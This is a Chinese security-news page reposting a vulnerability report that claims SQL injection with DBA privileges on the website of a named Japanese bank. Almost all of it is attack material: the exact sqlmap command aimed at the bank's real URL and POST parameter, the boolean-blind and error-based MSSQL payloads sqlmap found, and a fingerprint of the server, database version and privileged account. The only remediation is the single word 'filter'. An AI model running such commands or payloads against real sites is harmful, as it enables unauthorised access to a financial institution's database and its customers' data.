频道栏目
首页 > 资讯 > 企业安全 > 正文

日本東和銀行存在SQL注入(DBA权限)

16-07-16        来源:[db:作者]  
收藏   我要投稿

Microsoft SQL Server 2012!!!

 

website: http://www.towabank.co.jp/index.asp

python sqlmap.py -u "http://www.towabank.co.jp/index.asp" -p MenuNo --technique=BE  --form --random-agent

 

 

---
Parameter: MenuNo (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: MenuNo=(SELECT (CASE WHEN (4746=4746) THEN CHAR(118)+CHAR(87)+CHAR(71)+CHAR(120) ELSE 4746*(SELECT 4746 FROM master..sysdatabases) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: MenuNo=(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3061=3061) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))))
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
current user:    'FsolAdmin'
current user is DBA:    True
database management system users [1]:
[*] ##MS_AgentSigningCertificate##

 

解决方案:

过滤

相关TAG标签
上一篇:联众世界某站任意文件写入Getshell(内部众多拓扑信息泄露)
下一篇:买卖提某系统GetShell涉及700多万敏感信息(用户/姓名/手机号等)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站